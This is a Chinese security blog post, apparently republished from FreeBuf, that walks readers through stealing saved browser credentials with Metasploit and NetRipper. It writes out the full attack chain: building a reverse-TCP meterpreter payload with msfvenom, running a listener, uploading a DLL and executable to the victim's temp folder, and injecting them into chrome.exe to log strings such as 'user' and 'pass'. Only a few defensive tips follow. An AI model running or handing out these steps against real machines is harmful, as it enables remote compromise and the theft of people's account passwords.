关注我们
QRcode 邮件联系 新浪微博
首页 > web安全 » 正文

Metasploit+NetRipper获取Chrome等浏览器帐号密码测试

     条点评
后台-系统设置-扩展变量-手机广告位-内容正文顶部

前言

本篇文章我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。

需要工具:

Kali Linux&Metasploit

NetRipper

1.下载并且配置NetRipper

git clone https://github.com/NytroRST/NetRipper.git

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

2.生成Windows的Payload用于建立于目标机器的连接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe

3.启动Metasploit并且进行监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST IP

set LPORT 6666

options

exploit

目标机运行Payload获取到反弹shell

4.上传DLL和exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下

Upload /root/Desjtop/NetRipper/x64/DLL.dll
Upload /root/Desjtop/NetRipper/x64/NetRipper.exe

 图片.png

shell
NetRipper.exe


运行NetRipper.exe

NetRipper.exe –w DLL.dll –l TEMP –p true –d 4096 –s user,pass

NetRipper.exe ConfiguredDLL.dll chrome.exe 

我注入到了是chrome浏览器的进程,你也可以注入到其他浏览器(火狐,QQ浏览器,360浏览器等等)的进程,这里以Chrom浏览器为主

5.测试验证

打开那个刚刚下载的txt文件

Ctir+F输入pwpw或者pwd、pass、password等关键词来搜索明文密码

参考文章:Freebuf玩转metasploit系列(第八集)

如果获取失败帐号密码的话,可能是网站使用了Https协议,或者登陆时在本地就进行了帐号口令的一个加密混淆!(个人推断)

防范方法:

1.不要点击来历不明的文件

2.浏览器登录可以扫描就扫描登录

3.如果没有必要个人建议不要在浏览器保存自己的社交帐号密码

*本文作者:艾登——皮尔斯,转载请注明来自FreeBuf.COM

后台-系统设置-扩展变量-手机广告位-内容正文底部
本文标签:
内存取证:查找Metasploit的Meterpreter踪迹
ThinkPHP 框架SQL注入技术分析
  内存取证:查找Metasploit的Meterpreter踪迹 内存取证:查找Metasploit的Meterpreter踪  谨防隐私泄露,一个链接就能了解你的一切 谨防隐私泄露,一个链接就能了解你的一切  黑客入侵加密企业所有服务器,嚣张留言勒索9.5比特币 黑客入侵加密企业所有服务器,嚣张留言勒索  Pam Pam  记一次网站测试引发的注入“血案” 记一次网站测试引发的注入“血案”  从PNG tEXt到存储型XSS 从PNG tEXt到存储型XSS  某搜索引擎Self 某搜索引擎Self  浏览器的自动填充功能真的安全吗?我看未必! 浏览器的自动填充功能真的安全吗?我看未必

已有条评论,欢迎点评!